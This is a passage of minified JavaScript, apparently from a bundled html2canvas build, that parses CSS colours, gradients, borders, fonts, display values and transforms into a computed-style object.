0==(255&fe)},tr=function(fe){var ce=255&fe,ge=255&fe>>8,_e=255&fe>>16,je=255&fe>>24;return ce<255?"rgba("+je+","+_e+","+ge+","+ce/255+")":"rgb("+je+","+_e+","+ge+")"},ko=function(fe,ce,ge,_e){return(fe<<24|ce<<16|ge<<8|Math.round(255*_e)<<0)>>>0},Gd=function(fe,ce){if(17===fe.type)return fe.number;if(16===fe.type){var ge=3===ce?1:255;return 3===ce?fe.number/100*ge:Math.round(fe.number/100*ge)}return 0},rd=function(fe,ce){var ge=ce.filter(Wl);if(3===ge.length){var _e=ge.map(Gd);return ko(_e[0],_e[1],_e[2],1)}if(4===ge.length){var _t=ge.map(Gd);return ko(_t[0],_t[1],_t[2],_t[3])}return 0};function ic(fe,ce,ge){return ge<0&&(ge+=1),ge>=1&&(ge-=1),ge<1/6?(ce-fe)*ge*6+fe:ge<.5?ce:ge<2/3?6*(ce-fe)*(2/3-ge)+fe:fe}var jd=function(fe,ce){var ge=ce.filter(Wl),_e=ge[0],je=ge[1],tt=ge[2],dt=ge[3],_t=(17===_e.type?ms(_e.number):Bl_parse(fe,_e))/(2*Math.PI),gt=In(je)?je.number/100:0,kt=In(tt)?tt.number/100:0,Lt=void 0!==dt&&In(dt)?_n(dt,1):1;if(0===gt)return ko(255*kt,255*kt,255*kt,1);var Ht=kt<=.5?kt*(gt+1):kt+gt-kt*gt,ui=2*kt-Ht,Ki=ic(ui,Ht,_t+1/3),Ni=ic(ui,Ht,_t),Ui=ic(ui,Ht,_t-1/3);return ko(255*Ki,255*Ni,255*Ui,Lt)},Hm={hsl:jd,hsla:jd,rgb:rd,rgba:rd},uo=function(fe,ce){return Hs_parse(fe,Fr.create(ce).parseComponentValue())},Nc={ALICEBLUE:4042850303,ANTIQUEWHITE:4209760255,AQUA:16777215,AQUAMARINE:2147472639,AZURE:4043309055,BEIGE:4126530815,BISQUE:4293182719,BLACK:255,BLANCHEDALMOND:4293643775,BLUE:65535,BLUEVIOLET:2318131967,BROWN:2771004159,BURLYWOOD:3736635391,CADETBLUE:1604231423,CHARTREUSE:2147418367,CHOCOLATE:3530104575,CORAL:4286533887,CORNFLOWERBLUE:1687547391,CORNSILK:4294499583,CRIMSON:3692313855,CYAN:16777215,DARKBLUE:35839,DARKCYAN:9145343,DARKGOLDENROD:3095837695,DARKGRAY:2846468607,DARKGREEN:6553855,DARKGREY:2846468607,DARKKHAKI:3182914559,DARKMAGENTA:2332068863,DARKOLIVEGREEN:1433087999,DARKORANGE:4287365375,DARKORCHID:2570243327,DARKRED:2332033279,DARKSALMON:3918953215,DARKSEAGREEN:2411499519,DARKSLATEBLUE:1211993087,DARKSLATEGRAY:793726975,DARKSLATEGREY:793726975,DARKTURQUOISE:13554175,DARKVIOLET:2483082239,DEEPPINK:4279538687,DEEPSKYBLUE:12582911,DIMGRAY:1768516095,DIMGREY:1768516095,DODGERBLUE:512819199,FIREBRICK:2988581631,FLORALWHITE:4294635775,FORESTGREEN:579543807,FUCHSIA:4278255615,GAINSBORO:3705462015,GHOSTWHITE:4177068031,GOLD:4292280575,GOLDENROD:3668254975,GRAY:2155905279,GREEN:8388863,GREENYELLOW:2919182335,GREY:2155905279,HONEYDEW:4043305215,HOTPINK:4285117695,INDIANRED:3445382399,INDIGO:1258324735,IVORY:4294963455,KHAKI:4041641215,LAVENDER:3873897215,LAVENDERBLUSH:4293981695,LAWNGREEN:2096890111,LEMONCHIFFON:4294626815,LIGHTBLUE:2916673279,LIGHTCORAL:4034953471,LIGHTCYAN:3774873599,LIGHTGOLDENRODYELLOW:4210742015,LIGHTGRAY:3553874943,LIGHTGREEN:2431553791,LIGHTGREY:3553874943,LIGHTPINK:4290167295,LIGHTSALMON:4288707327,LIGHTSEAGREEN:548580095,LIGHTSKYBLUE:2278488831,LIGHTSLATEGRAY:2005441023,LIGHTSLATEGREY:2005441023,LIGHTSTEELBLUE:2965692159,LIGHTYELLOW:4294959359,LIME:16711935,LIMEGREEN:852308735,LINEN:4210091775,MAGENTA:4278255615,MAROON:2147483903,MEDIUMAQUAMARINE:1724754687,MEDIUMBLUE:52735,MEDIUMORCHID:3126187007,MEDIUMPURPLE:2473647103,MEDIUMSEAGREEN:1018393087,MEDIUMSLATEBLUE:2070474495,MEDIUMSPRINGGREEN:16423679,MEDIUMTURQUOISE:1221709055,MEDIUMVIOLETRED:3340076543,MIDNIGHTBLUE:421097727,MINTCREAM:4127193855,MISTYROSE:4293190143,MOCCASIN:4293178879,NAVAJOWHITE:4292783615,NAVY:33023,OLDLACE:4260751103,OLIVE:2155872511,OLIVEDRAB:1804477439,ORANGE:4289003775,ORANGERED:4282712319,ORCHID:3664828159,PALEGOLDENROD:4008225535,PALEGREEN:2566625535,PALETURQUOISE:2951671551,PALEVIOLETRED:3681588223,PAPAYAWHIP:4293907967,PEACHPUFF:4292524543,PERU:3448061951,PINK:4290825215,PLUM:3718307327,POWDERBLUE:2967529215,PURPLE:2147516671,REBECCAPURPLE:1714657791,RED:4278190335,ROSYBROWN:3163525119,ROYALBLUE:1097458175,SADDLEBROWN:2336560127,SALMON:4202722047,SANDYBROWN:4104413439,SEAGREEN:780883967,SEASHELL:4294307583,SIENNA:2689740287,SILVER:3233857791,SKYBLUE:2278484991,SLATEBLUE:1784335871,SLATEGRAY:1887473919,SLATEGREY:1887473919,SNOW:4294638335,SPRINGGREEN:16744447,STEELBLUE:1182971135,TAN:3535047935,TEAL:8421631,THISTLE:3636451583,TOMATO:4284696575,TRANSPARENT:0,TURQUOISE:1088475391,VIOLET:4001558271,WHEAT:4125012991,WHITE:4294967295,WHITESMOKE:4126537215,YELLOW:4294902015,YELLOWGREEN:2597139199},n_={name:"background-clip",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},us={name:"background-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},Is=function(fe,ce){var ge=Hs_parse(fe,ce[0]),_e=ce[1];return _e&&In(_e)?{color:ge,stop:_e}:{color:ge,stop:null}},Gu=function(fe,ce){var ge=fe[0],_e=fe[fe.length-1];null===ge.stop&&(ge.stop=xo),null===_e.stop&&(_e.stop=Ia);for(var je=[],tt=0,dt=0;dt<fe.length;dt++){var _t=fe[dt].stop;if(null!==_t){var gt=_n(_t,ce);je.push(gt>tt?gt:tt),tt=gt}else je.push(null)}var kt=null;for(dt=0;dt<je.length;dt++){var Lt=je[dt];if(null===Lt)null===kt&&(kt=dt);else if(null!==kt){for(var Ht=dt-kt,Ki=(Lt-je[kt-1])/(Ht+1),Ni=1;Ni<=Ht;Ni++)je[kt+Ni-1]=Ki*Ni;kt=null}}return fe.map(function(Ui,dn){return{color:Ui.color,stop:Math.max(Math.min(1,je[dn]/ce),0)}})},uc=function(fe,ce,ge){var _e="number"==typeof fe?fe:function(fe,ce,ge){var _e=ce/2,je=ge/2,tt=_n(fe[0],ce)-_e,dt=je-_n(fe[1],ge);return(Math.atan2(dt,tt)+2*Math.PI)%(2*Math.PI)}(fe,ce,ge),je=Math.abs(ce*Math.sin(_e))+Math.abs(ge*Math.cos(_e)),tt=ce/2,dt=ge/2,_t=je/2,gt=Math.sin(_e-Math.PI/2)*_t,kt=Math.cos(_e-Math.PI/2)*_t;return[je,tt-kt,tt+kt,dt-gt,dt+gt]},gr=function(fe,ce){return Math.sqrt(fe*fe+ce*ce)},s0=function(fe,ce,ge,_e,je){return[[0,0],[0,ce],[fe,0],[fe,ce]].reduce(function(dt,_t){var Lt=gr(ge-_t[0],_e-_t[1]);return(je?Lt<dt.optimumDistance:Lt>dt.optimumDistance)?{optimumCorner:_t,optimumDistance:Lt}:dt},{optimumDistance:je?1/0:-1/0,optimumCorner:null}).optimumCorner},ju=function(fe,ce){var ge=ms(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&-1!==["top","left","right","bottom"].indexOf(dt.value))return void(ge=$a(je));if(tc(dt))return void(ge=(Bl_parse(fe,dt)+ms(270))%ms(360))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},U2="closest-side",l0="farthest-side",hc="closest-corner",q2="farthest-corner",G2="ellipse",Q2="contain",Tf=function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t?gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"center":return tt.push(Vi),!1;case"top":case"left":return tt.push(xo),!1;case"right":case"bottom":return tt.push(Ia),!1}else if(In(Ht)||ws(Ht))return tt.push(Ht),!1;return Lt},gt):1===_t&&(gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case Q2:case U2:return _e=0,!1;case l0:return _e=1,!1;case hc:return _e=2,!1;case"cover":case q2:return _e=3,!1}else if(ws(Ht)||In(Ht))return Array.isArray(_e)||(_e=[]),_e.push(Ht),!1;return Lt},gt)),gt){var kt=Is(fe,dt);je.push(kt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},m0_parse=function(fe,ce){if(22===ce.type){var ge={url:ce.value,type:0};return fe.cache.addImage(ce.value),ge}if(18===ce.type){var _e=xf[ce.name];if(void 0===_e)throw new Error('Attempting to parse an unsupported image function "'+ce.name+'"');return _e(fe,ce.values)}throw new Error("Unsupported image type "+ce.type)};for(var xf={"linear-gradient":function(fe,ce){var ge=ms(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&"to"===dt.value)return void(ge=$a(je));if(tc(dt))return void(ge=Bl_parse(fe,dt))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},"-moz-linear-gradient":ju,"-ms-linear-gradient":ju,"-o-linear-gradient":ju,"-webkit-linear-gradient":ju,"radial-gradient":function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t){var kt=!1;gt=dt.reduce(function(Ht,ui){if(kt)if(tn(ui))switch(ui.value){case"center":return tt.push(Vi),Ht;case"top":case"left":return tt.push(xo),Ht;case"right":case"bottom":return tt.push(Ia),Ht}else(In(ui)||ws(ui))&&tt.push(ui);else if(tn(ui))switch(ui.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case"at":return kt=!0,!1;case U2:return _e=0,!1;case"cover":case l0:return _e=1,!1;case Q2:case hc:return _e=2,!1;case q2:return _e=3,!1}else if(ws(ui)||In(ui))return Array.isArray(_e)||(_e=[]),_e.push(ui),!1;return Ht},gt)}if(gt){var Lt=Is(fe,dt);je.push(Lt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},"-moz-radial-gradient":Tf,"-ms-radial-gradient":Tf,"-o-radial-gradient":Tf,"-webkit-radial-gradient":Tf,"-webkit-gradient":function(fe,ce){var ge=ms(180),_e=[],je=1;return xs(ce).forEach(function(gt,kt){var Lt=gt[0];if(0===kt){if(tn(Lt)&&"linear"===Lt.value)return void(je=1);if(tn(Lt)&&"radial"===Lt.value)return void(je=2)}if(18===Lt.type)if("from"===Lt.name){var Ht=Hs_parse(fe,Lt.values[0]);_e.push({stop:xo,color:Ht})}else if("to"===Lt.name)Ht=Hs_parse(fe,Lt.values[0]),_e.push({stop:Ia,color:Ht});else if("color-stop"===Lt.name){var ui=Lt.values.filter(Wl);if(2===ui.length){Ht=Hs_parse(fe,ui[1]);var Ki=ui[0];ur(Ki)&&_e.push({stop:{type:16,number:100*Ki.number,flags:Ki.flags},color:Ht})}}}),1===je?{angle:(ge+ms(180))%ms(360),stops:_e,type:je}:{size:3,shape:0,stops:_e,position:[],type:je}}},$2={name:"background-image",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce.filter(function(_e){return Wl(_e)&&function o_(fe){return!(20===fe.type&&"none"===fe.value||18===fe.type&&!xf[fe.name])}(_e)}).map(function(_e){return m0_parse(fe,_e)})}},LM={name:"background-origin",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},K2={name:"background-position",initialValue:"0% 0%",type:1,prefix:!1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(In)}).map(a_)}},Qd={name:"background-repeat",initialValue:"repeat",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(tn).map(function(_e){return _e.value}).join(" ")}).map(u0)}},u0=function(fe){switch(fe){case"no-repeat":return 1;case"repeat-x":case"repeat no-repeat":return 2;case"repeat-y":case"no-repeat repeat":return 3;default:return 0}},sa=(()=>{return(fe=sa||(sa={})).AUTO="auto",fe.CONTAIN="contain",fe.COVER="cover",sa;var fe})(),h0={name:"background-size",initialValue:"0",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(f0)})}},f0=function(fe){return tn(fe)||In(fe)},wf=function(fe){return{name:"border-"+fe+"-color",initialValue:"transparent",prefix:!1,type:3,format:"color"}},p0=wf("top"),r_=wf("right"),X2=wf("bottom"),If=wf("left"),Qu=function(fe){return{name:"border-radius-"+fe,initialValue:"0 0",prefix:!1,type:1,parse:function(ce,ge){return a_(ge.filter(In))}}},fc=Qu("top-left"),s_=Qu("top-right"),Y2=Qu("bottom-right"),c_=Qu("bottom-left"),Rf=function(fe){return{name:"border-"+fe+"-style",initialValue:"solid",prefix:!1,type:2,parse:function(ce,ge){switch(ge){case"none":return 0;case"dashed":return 2;case"dotted":return 3;case"double":return 4}return 1}}},l_=Rf("top"),Ar=Rf("right"),J2=Rf("bottom"),zM=Rf("left"),$d=function(fe){return{name:"border-"+fe+"-width",initialValue:"0",type:0,prefix:!1,parse:function(ce,ge){return Un(ge)?ge.number:0}}},pc=$d("top"),Z2=$d("right"),d_=$d("bottom"),Lc=$d("left"),hs={name:"color",initialValue:"transparent",prefix:!1,type:3,format:"color"},$u={name:"direction",initialValue:"ltr",prefix:!1,type:2,parse:function(fe,ce){return"rtl"===ce?1:0}},Um={name:"display",initialValue:"inline-block",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).reduce(function(ge,_e){return ge|eC(_e.value)},0)}},eC=function(fe){switch(fe){case"block":case"-webkit-box":return 2;case"inline":return 4;case"run-in":return 8;case"flow":return 16;case"flow-root":return 32;case"table":return 64;case"flex":case"-webkit-flex":return 128;case"grid":case"-ms-grid":return 256;case"ruby":return 512;case"subgrid":return 1024;case"list-item":return 2048;case"table-row-group":return 4096;case"table-header-group":return 8192;case"table-footer-group":return 16384;case"table-row":return 32768;case"table-cell":return 65536;case"table-column-group":return 131072;case"table-column":return 262144;case"table-caption":return 524288;case"ruby-base":return 1048576;case"ruby-text":return 2097152;case"ruby-base-container":return 4194304;case"ruby-text-container":return 8388608;case"contents":return 16777216;case"inline-block":return 33554432;case"inline-list-item":return 67108864;case"inline-table":return 134217728;case"inline-flex":return 268435456;case"inline-grid":return 536870912}return 0},Rs={name:"float",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"left":return 1;case"right":return 2;case"inline-start":return 3;case"inline-end":return 4}return 0}},m_={name:"letter-spacing",initialValue:"0",prefix:!1,type:0,parse:function(fe,ce){return 20===ce.type&&"normal"===ce.value?0:17===ce.type||15===ce.type?ce.number:0}},sd=(()=>{return(fe=sd||(sd={})).NORMAL="normal",fe.STRICT="strict",sd;var fe})(),Ua={name:"line-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"strict"===ce?sd.STRICT:sd.NORMAL}},u_={name:"line-height",initialValue:"normal",prefix:!1,type:4},tC=function(fe,ce){return tn(fe)&&"normal"===fe.value?1.2*ce:17===fe.type?ce*fe.number:In(fe)?_n(fe,ce):ce},h_={name:"list-style-image",initialValue:"none",type:0,prefix:!1,parse:function(fe,ce){return 20===ce.type&&"none"===ce.value?null:m0_parse(fe,ce)}},iC={name:"list-style-position",initialValue:"outside",prefix:!1,type:2,parse:function(fe,ce){return"inside"===ce?0:1}},Sf={name:"list-style-type",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"disc":return 0;case"circle":return 1;case"square":return 2;case"decimal":return 3;case"cjk-decimal":return 4;case"decimal-leading-zero":return 5;case"lower-roman":return 6;case"upper-roman":return 7;case"lower-greek":return 8;case"lower-alpha":return 9;case"upper-alpha":return 10;case"arabic-indic":return 11;case"armenian":return 12;case"bengali":return 13;case"cambodian":return 14;case"cjk-earthly-branch":return 15;case"cjk-heavenly-stem":return 16;case"cjk-ideographic":return 17;case"devanagari":return 18;case"ethiopic-numeric":return 19;case"georgian":return 20;case"gujarati":return 21;case"gurmukhi":case"hebrew":return 22;case"hiragana":return 23;case"hiragana-iroha":return 24;case"japanese-formal":return 25;case"japanese-informal":return 26;case"kannada":return 27;case"katakana":return 28;case"katakana-iroha":return 29;case"khmer":return 30;case"korean-hangul-formal":return 31;case"korean-hanja-formal":return 32;case"korean-hanja-informal":return 33;case"lao":return 34;case"lower-armenian":return 35;case"malayalam":return 36;case"mongolian":return 37;case"myanmar":return 38;case"oriya":return 39;case"persian":return 40;case"simp-chinese-formal":return 41;case"simp-chinese-informal":return 42;case"tamil":return 43;case"telugu":return 44;case"thai":return 45;case"tibetan":return 46;case"trad-chinese-formal":return 47;case"trad-chinese-informal":return 48;case"upper-armenian":return 49;case"disclosure-open":return 50;case"disclosure-closed":return 51;default:return-1}}},Ku=function(fe){return{name:"margin-"+fe,initialValue:"0",prefix:!1,type:4}},f_=Ku("top"),qm=Ku("right"),bi=Ku("bottom"),Rn=Ku("left"),be={name:"overflow",initialValue:"visible",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"hidden":return 1;case"scroll":return 2;case"clip":return 3;case"auto":return 4;default:return 0}})}},Me={name:"overflow-wrap",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"break-word"===ce?"break-word":"normal"}},or=function(fe){return{name:"padding-"+fe,initialValue:"0",prefix:!1,type:3,format:"length-percentage"}},kf=or("top"),Kd=or("right"),_c=or("bottom"),Xu=or("left"),Yu={name:"text-align",initialValue:"left",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"right":return 2;case"center":case"justify":return 1;default:return 0}}},p_={name:"position",initialValue:"static",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"relative":return 1;case"absolute":return 2;case"fixed":return 3;case"sticky":return 4}return 0}},_0={name:"text-shadow",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return 1===ce.length&&ds(ce[0],"none")?[]:xs(ce).map(function(ge){for(var _e={color:Nc.TRANSPARENT,offsetX:xo,offsetY:xo,blur:xo},je=0,tt=0;tt<ge.length;tt++){var dt=ge[tt];ws(dt)?(0===je?_e.offsetX=dt:1===je?_e.offsetY=dt:_e.blur=dt,je++):_e.color=Hs_parse(fe,dt)}return _e})}},aC={name:"text-transform",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"uppercase":return 2;case"lowercase":return 1;case"capitalize":return 3}return 0}},g0={name:"transform",initialValue:"none",prefix:!0,type:0,parse:function(fe,ce){if(20===ce.type&&"none"===ce.value)return null;if(18===ce.type){var ge=C0[ce.name];if(void 0===ge)throw new Error('Attempting to parse an unsupported transform function "'+ce.name+'"');return ge(ce.values)}return null}},C0={matrix:function(fe){var ce=fe.filter(function(ge){return 17===ge.type}).map(function(ge){return ge.number});return 6===ce.length?ce:null},matrix3d:function(fe){var ce=fe.filter(function(gt){return 17===gt.type}).map(function(gt){return gt.number});return 16===ce.length?[ce[0],ce[1],ce[4],ce[5],ce[12],ce[13]]:null}},cd={type:16,number:50,flags:4},ul=[cd,cd],y0={name:"transform-origin",initialValue:"50% 50%",prefix:!0,type:1,parse:function(fe,ce){var ge=ce.filter(In);return 2!==ge.length?ul:[ge[0],ge[1]]}},b0={name:"visible",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"hidden":return 1;case"collapse":return 2;default:return 0}}},Gm=(()=>{return(fe=Gm||(Gm={})).NORMAL="normal",fe.BREAK_ALL="break-all",fe.KEEP_ALL="keep-all",Gm;var fe})(),nC={name:"word-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"break-all":return Gm.BREAK_ALL;case"keep-all":return Gm.KEEP_ALL;default:return Gm.NORMAL}}},__={name:"z-index",initialValue:"auto",prefix:!1,type:0,parse:function(fe,ce){if(20===ce.type)return{auto:!0,order:0};if(ur(ce))return{auto:!1,order:ce.number};throw new Error("Invalid z-index number parsed")}},Pf={name:"time",parse:function(fe,ce){if(15===ce.type)switch(ce.unit.toLowerCase()){case"s":return 1e3*ce.number;case"ms":return ce.number}throw new Error("Unsupported time type")}},ld={name:"opacity",initialValue:"1",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:1}},g_={name:"text-decoration-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},zc={name:"text-decoration-line",initialValue:"none",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"underline":return 1;case"overline":return 2;case"line-through":return 3;case"none":return 4}return 0}).filter(function(ge){return 0!==ge})}},M0={name:"font-family",initialValue:"",prefix:!1,type:1,parse:function(fe,ce){var ge=[],_e=[];return ce.forEach(function(je){switch(je.type){case 20:case 0:ge.push(je.value);break;case 17:ge.push(je.number.toString());break;case 4:_e.push(ge.join(" ")),ge.length=0}}),ge.length&&_e.push(ge.join(" ")),_e.map(function(je){return-1===je.indexOf(" ")?je:"'"+je+"'"})}},C_={name:"font-size",initialValue:"0",prefix:!1,type:3,format:"length"},y_={name:"font-weight",initialValue:"normal",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:tn(ce)&&"bold"===ce.value?700:400}},v0={name:"font-variant",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){return ge.value})}},A0={name:"font-style",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"oblique":return"oblique";case"italic":return"italic";default:return"normal"}}},Tr=function(fe,ce){return 0!=(fe&ce)},b_={name:"content",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce}},oC={name:"counter-increment",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return null;var ge=ce[0];if(20===ge.type&&"none"===ge.value)return null;for(var _e=[],je=ce.filter(Bm),tt=0;tt<je.length;tt++){var dt=je[tt],_t=je[tt+1];if(20===dt.type){var gt=_t&&ur(_t)?_t.number:1;_e.push({counter:dt.value,increment:gt})}}return _e}},rC={name:"counter-reset",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return[];for(var ge=[],_e=ce.filter(Bm),je=0;je<_e.length;je++){var tt=_e[je],dt=_e[je+1];if(tn(tt)&&"none"!==tt.value){var _t=dt&&ur(dt)?dt.number:0;ge.push({counter:tt.value,reset:_t})}}return ge}},Ss={name:"duration",initialValue:"0s",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(Un).map(function(ge){return Pf.parse(fe,ge)})}},hl={name:"quotes",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return null;var ge=ce[0];if(20===ge.type&&"none"===ge.value)return null;var _e=[],je=ce.filter(zl);if(je.length%2!=0)return null;for(var tt=0;tt<je.length;tt+=2)_e.push({open:je[tt].value,close:je[tt+1].value});return _e}},rr=function(fe,ce,ge){if(!fe)return"";var _e=fe[Math.min(ce,fe.length-1)];return _e?ge?_e.open:_e.close:""},fi={name:"box-shadow",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return 1===ce.length&&ds(ce[0],"none")?[]:xs(ce).map(function(ge){for(var _e={color:255,offsetX:xo,offsetY:xo,blur:xo,spread:xo,inset:!1},je=0,tt=0;tt<ge.length;tt++){var dt=ge[tt];ds(dt,"inset")?_e.inset=!0:ws(dt)?(0===je?_e.offsetX=dt:1===je?_e.offsetY=dt:2===je?_e.blur=dt:_e.spread=dt,je++):_e.color=Hs_parse(fe,dt)}return _e})}},sC={name:"paint-order",initialValue:"normal",prefix:!1,type:1,parse:function(fe,ce){var _e=[];return ce.filter(tn).forEach(function(je){switch(je.value){case"stroke":_e.push(1);break;case"fill":_e.push(0);break;case"markers":_e.push(2)}}),[0,1,2].forEach(function(je){-1===_e.indexOf(je)&&_e.push(je)}),_e}},ln={name:"-webkit-text-stroke-color",initialValue:"currentcolor",prefix:!1,type:3,format:"color"},cC={name:"-webkit-text-stroke-width",initialValue:"0",type:0,prefix:!1,parse:function(fe,ce){return Un(ce)?ce.number:0}},lC=function(){function fe(ce,ge){var _e,je;this.animationDuration=ji(ce,Ss,ge.animationDuration),this.backgroundClip=ji(ce,n_,ge.backgroundClip),this.backgroundColor=ji(ce,us,ge.backgroundColor),this.backgroundImage=ji(ce,$2,ge.backgroundImage),this.backgroundOrigin=ji(ce,LM,ge.backgroundOrigin),this.backgroundPosition=ji(ce,K2,ge.backgroundPosition),this.backgroundRepeat=ji(ce,Qd,ge.backgroundRepeat),this.backgroundSize=ji(ce,h0,ge.backgroundSize),this.borderTopColor=ji(ce,p0,ge.borderTopColor),this.borderRightColor=ji(ce,r_,ge.borderRightColor),this.borderBottomColor=ji(ce,X2,ge.borderBottomColor),this.borderLeftColor=ji(ce,If,ge.borderLeftColor),this.borderTopLeftRadius=ji(ce,fc,ge.borderTopLeftRadius),this.borderTopRightRadius=ji(ce,s_,ge.borderTopRightRadius),this.borderBottomRightRadius=ji(ce,Y2,ge.borderBottomRightRadius),this.borderBottomLeftRadius=ji(ce,c_,ge.borderBottomLeftRadius),this.borderTopStyle=ji(ce,l_,ge.borderTopStyle),this.borderRightStyle=ji(ce,Ar,ge.borderRightStyle),this.borderBottomStyle=ji(ce,J2,ge.borderBottomStyle),this.borderLeftStyle=ji(ce,zM,ge.borderLeftStyle),this.borderTopWidth=ji(ce,pc,ge.borderTopWidth),this.borderRightWidth=ji(ce,Z2,ge.borderRightWidth),this.borderBottomWidth=ji(ce,d_,ge.borderBottomWidth),this.borderLeftWidth=ji(ce,Lc,ge.borderLeftWidth),this.boxShadow=ji(ce,fi,ge.boxShadow),this.color=ji(ce,hs,ge.color),this.direction=ji(ce,$u,ge.direction),this.display=ji(ce,Um,ge.display),this.float=ji(ce,Rs,ge.cssFloat),this.fontFamily=ji(ce,M0,ge.fontFamily),this.fontSize=ji(ce,C_,ge.fontSize),this.fontStyle=ji(ce,A0,ge.fontStyle),this.fontVariant=ji(ce,v0,ge.fontVariant),this.fontWeight=ji(ce,y_,ge.fontWeight),this.letterSpacing=ji(ce,m_,ge.letterSpacing),this.lineBreak=ji(ce,Ua,ge.lineBreak),this.lineHeight=ji(ce,u_,ge.lineHeight),this.listStyleImage=ji(ce,h_,ge.listStyleImage),this.listStylePosition=ji(ce,iC,ge.listStylePosition),this.listStyleType=ji(ce,Sf,ge.listStyleType),this.marginTop=ji(ce,f_,ge.marginTop),this.marginRight=ji(ce,qm,ge.marginRight),this.marginBottom=ji(ce,bi,ge.marginBottom),this.marginLeft=ji(ce,Rn,ge.marginLeft),this.opacity=ji(ce,ld,ge.opacity);var tt=ji(ce,be,ge.overflow);this.overflowX=tt[0],this.overflowY=tt[tt.length>1?1:0],this.overflowWrap=ji(ce,Me,ge.overflowWrap),this.paddingTop=ji(ce,kf,ge.paddingTop),this.paddingRight=ji(ce,Kd,ge.paddingRight),this.paddingBottom=ji(ce,_c,ge.paddingBottom),this.paddingLeft=ji(ce,Xu,ge.paddingLeft),this.paintOrder=ji(ce,sC,ge.paintOrder),this.position=ji(ce,p_,ge.position),this.textAlign=ji(ce,Yu,ge.textAlign),this.textDecorationColor=ji(ce,g_,null!==(_e=ge.textDecorationColor)&&void 0!==_e?_e:ge.color),this.textDecorationLine=ji(ce,zc,null!==(je=ge.textDecorationLine)&&void 0!==je?je:ge.textDecoration),this.textShadow=ji(ce,_0,ge.textShadow),this.textTransform=ji(ce,aC,ge.textTransform),this.transform=ji(ce,g0,ge.transform),this.transformOrigin=ji(ce,y0,ge.transformOrigin),this.visibility=ji(ce,b0,ge.visibility),this.webkitTextStrokeColor=ji(ce,ln,ge.webkitTextStrokeColor),this.webkitTextStrokeWidth=ji(ce,cC,ge.webkitTextStrokeWidth),this.wordBreak=ji(ce,nC,ge.wordBreak),this.zIndex=ji(ce,__,ge.zIndex)}return fe.prototype.isVisible=function(){return this.display>0&&this.opacity>0&&0===this.visibility},fe.prototype.isTransparent=function(){return Oc(this.backgroundColor)},fe.prototype.isTransformed=function(){return null!==this.transform},fe.prototype.isPositioned=function(){return 0!==this.position},fe.prototype.isPositionedWithZIndex=function(){return this.isPositioned()&&!this.zIndex.auto},fe.prototype.isFloating=function(){return 0!==this.float},fe.prototype.isInlineLevel=function(){return Tr(this.display,4)||Tr(this.display,33554432)||Tr(this.display,268435456)||Tr(this.display,536870912)||Tr(this.display,67108864)||Tr(this.display,134217728)},fe}(),dC=function fe(ce,ge){this.content=ji(ce,b_,ge.content),this.quotes=ji(ce,hl,ge.quotes)},Ju=function fe(ce,ge){this.counterIncrement=ji(ce,oC,ge.counterIncrement),this.counterReset=ji(ce,rC,ge.counterReset)},ji=function(fe,ce,ge){var _e=new Ot,je=null!=ge?ge.toString():ce.initialValue;_e.write(je);var tt=new Fr(_e.read());switch(ce.type){case 2:var dt=tt.parseComponentValue();return ce.parse(fe,tn(dt)?dt.value:ce.initialValue);case 0:return 